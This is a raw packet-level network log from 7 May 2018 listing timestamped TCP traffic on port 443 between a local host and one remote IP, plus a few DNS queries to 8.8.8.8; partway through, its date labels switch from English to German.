May 7, 2018 14:49:53.975589991 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975613117 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975728035 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.975815058 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.976135969 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.976272106 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.017394066 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017425060 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017440081 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017455101 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017469883 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017489910 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017529011 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017541885 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017586946 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017605066 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017617941 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.017788887 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.017868042 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.018203020 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.018316031 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.051266909 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051306009 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051323891 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051337957 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051351070 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051363945 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051399946 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051414013 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051434994 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051448107 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051460028 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051486015 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.051517963 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.051964045 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.080727100 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080754995 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080771923 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080782890 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080794096 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080806017 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080832005 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080843925 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080854893 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080866098 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.080876112 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.081202984 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.081245899 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.081315994 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.081872940 CEST 49164 443 192.168.1.81 91.92.137.74

May 7, 2018 14:49:54.093236923 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.113390923 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113408089 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113413095 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113420010 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113425016 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113430023 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113447905 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113461018 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113486052 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113493919 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113508940 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.113915920 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.113965988 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.114372015 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.147380114 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147403955 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147411108 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147418022 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147433043 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147443056 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147466898 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147476912 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147485971 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147495031 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147502899 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.147567987 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.147607088 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:54.151290894 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:54.170958042 CEST 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171022892 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171041012 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171055079 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171067953 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171092987 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171134949 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171152115 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171178102 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171204090 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171201944 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.171221972 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171247005 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.171684980 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.204014063 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204034090 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204041958 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204049110 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204070091 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204080105 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204101086 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204109907 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204118013 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204124928 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204133034 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.204498053 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.221975088 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.221999884 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.222067118 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.236031055 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236047029 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236057997 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236068010 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236078024 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236089945 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236121893 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236133099 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236143112 MESZ 443 49164 91.92.137.74 192.168.1.81


Mai 7, 2018 14:49:54.236154079 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236164093 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236263990 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.236291885 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.236521006 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.237157106 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.327577114 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327615023 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327642918 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327656984 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327670097 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327685118 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327728033 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327743053 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327758074 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327771902 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.327796936 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.328093052 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.328119040 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.328367949 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.329133034 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.450129986 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450149059 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450156927 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450164080 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450171947 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450179100 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450201035 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450208902 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450217962 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450225115 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450232029 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450582981 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.450606108 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.450865984 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.450937033 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.553405046 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553430080 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553446054 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553459883 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553473949 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553488016 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553513050 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553527117 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553539038 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553553104 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553566933 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.553756952 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.553781033 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.554011106 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.554476976 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.612673044 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612704992 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612716913 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612725019 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612735033 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612741947 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612776995 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612792015 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612803936 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612817049 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612828970 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.612880945 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.612925053 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.613523006 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.698668003 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698709965 MESZ 443 49164 91.92.137.74 192.168.1.81


Mai 7, 2018 14:49:54.698735952 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698749065 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698760986 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698775053 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698812962 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698828936 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698842049 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698853970 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.698867083 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.699132919 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.699177980 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.699539900 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.699651003 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.810642004 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810676098 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810688019 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810697079 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810705900 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810714006 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810735941 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810745001 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810753107 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810760021 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.810766935 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.811119080 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.811151028 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.811446905 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.811532974 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.923261881 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.923312902 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.923319101 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.923341990 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.923351049 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.923356056 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.923361063 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.923633099 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.923666000 MESZ 443 49164 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:54.924761057 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.925628901 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:54.925736904 MESZ 49164 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:57.409387112 MESZ 49912 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:57.457447052 MESZ 53 49912 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:57.499145985 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:57.499203920 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:57.499639034 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:57.620915890 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:57.620966911 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:58.977372885 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:58.977400064 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:58.977407932 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:58.977464914 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:58.980299950 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:58.981456995 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:58.981486082 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:58.982093096 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:58.982142925 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:59.590126991 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:59.604815960 MESZ 62993 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:59.627000093 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:59.656533003 MESZ 53 62993 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:59.668673992 MESZ 58780 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:49:59.710364103 MESZ 53 58780 8.8.8.8 192.168.1.81

Mai 7, 2018 14:49:59.958909035 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:59.959080935 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:59.959119081 MESZ 443 49165 91.92.137.74 192.168.1.81

Mai 7, 2018 14:49:59.959759951 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:59.959785938 MESZ 443 49165 91.92.137.74 192.168.1.81


Mai 7, 2018 14:49:59.960217953 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:59.960324049 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:49:59.960412025 MESZ 49165 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:00.029758930 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:00.029823065 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:00.029896021 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:00.031297922 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:00.031328917 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.060087919 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.060348988 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:01.085767984 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:01.085812092 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.091932058 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:01.091974020 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.725267887 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.725388050 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:01.725414991 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.725586891 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:01.725610018 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.726214886 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:01.726706982 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:01.726780891 MESZ 443 49167 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:01.726878881 MESZ 49167 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:18.129126072 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:18.129182100 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:18.129264116 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:18.130630016 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:18.130669117 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:18.660918951 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:18.662002087 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:18.699434042 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:18.699459076 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:18.826329947 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:18.826387882 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:19.132747889 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:19.132867098 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:19.132888079 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:19.132999897 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:19.133410931 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:19.134037018 MESZ 443 49168 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:19.136897087 MESZ 49168 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.125428915 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.125485897 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:20.125617981 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.127439022 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.127468109 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:20.630429029 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:20.630625963 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.681183100 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.681217909 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:20.687788010 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.687833071 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:20.956351995 MESZ 54934 53 192.168.1.81 8.8.8.8

Mai 7, 2018 14:50:20.987132072 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:20.987380981 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:20.987426043 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:20.992855072 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:21.010361910 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:21.010529995 MESZ 443 49169 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:21.011044025 MESZ 49169 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:21.265947104 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:21.265994072 MESZ 443 49170 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:21.266061068 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:21.267222881 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:21.267246962 MESZ 443 49170 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:21.522135973 MESZ 53 54934 8.8.8.8 192.168.1.81

Mai 7, 2018 14:50:21.526216030 MESZ 62845 53 192.168.1.81 8.8.8.8


Mai 7, 2018 14:50:21.625046015 MESZ 53 62845 8.8.8.8 192.168.1.81

Mai 7, 2018 14:50:21.959645987 MESZ 443 49170 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:21.959753036 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.248624086 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.248667002 MESZ 443 49170 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:22.254482985 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.254513025 MESZ 443 49170 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:22.511234999 MESZ 443 49170 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:22.511528969 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.511599064 MESZ 443 49170 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:22.511677027 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.511989117 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.512729883 MESZ 443 49170 91.92.137.74 192.168.1.81

